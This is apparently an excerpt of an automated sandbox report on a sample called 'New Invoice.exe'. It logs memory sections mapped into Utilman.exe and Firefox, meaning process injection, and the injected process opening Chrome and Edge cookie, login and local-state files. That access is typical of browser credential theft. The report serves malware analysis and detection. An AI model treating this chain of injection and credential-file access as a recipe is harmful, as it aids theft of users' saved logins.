Source: C:\Users\user\Desktop\New Invoice.exe	Section loaded: NULL target: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Section loaded: NULL target: C:\Windows\SysWOW64\Utilman.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: NULL target: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: NULL target: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Source: hDmn7H3zvRFO6rwhs5DOT.exe, 00000005.00000000.2154845095.0000000001691000.00000002.00000001.00040000.00000000.sdmp, hDmn7H3zvRFO6rwhs5DOT.exe, 00000005.00000002.4484115155.0000000001691000.00000002.00000001.00040000.00000000.sdmp, hDmn7H3zvRFO6rwhs5DOT.exe, 00000008.00000002.4484439153.00000000015E1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: hDmn7H3zvRFO6rwhs5DOT.exe, 00000005.00000000.2154845095.0000000001691000.00000002.00000001.00040000.00000000.sdmp, hDmn7H3zvRFO6rwhs5DOT.exe, 00000005.00000002.4484115155.0000000001691000.00000002.00000001.00040000.00000000.sdmp, hDmn7H3zvRFO6rwhs5DOT.exe, 00000008.00000002.4484439153.00000000015E1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: hDmn7H3zvRFO6rwhs5DOT.exe, 00000005.00000000.2154845095.0000000001691000.00000002.00000001.00040000.00000000.sdmp, hDmn7H3zvRFO6rwhs5DOT.exe, 00000005.00000002.4484115155.0000000001691000.00000002.00000001.00040000.00000000.sdmp, hDmn7H3zvRFO6rwhs5DOT.exe, 00000008.00000002.4484439153.00000000015E1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: hDmn7H3zvRFO6rwhs5DOT.exe, 00000005.00000000.2154845095.0000000001691000.00000002.00000001.00040000.00000000.sdmp, hDmn7H3zvRFO6rwhs5DOT.exe, 00000005.00000002.4484115155.0000000001691000.00000002.00000001.00040000.00000000.sdmp, hDmn7H3zvRFO6rwhs5DOT.exe, 00000008.00000002.4484439153.00000000015E1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\New Invoice.exe	Queries volume information: C:\Users\user\Desktop\New Invoice.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\Utilman.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior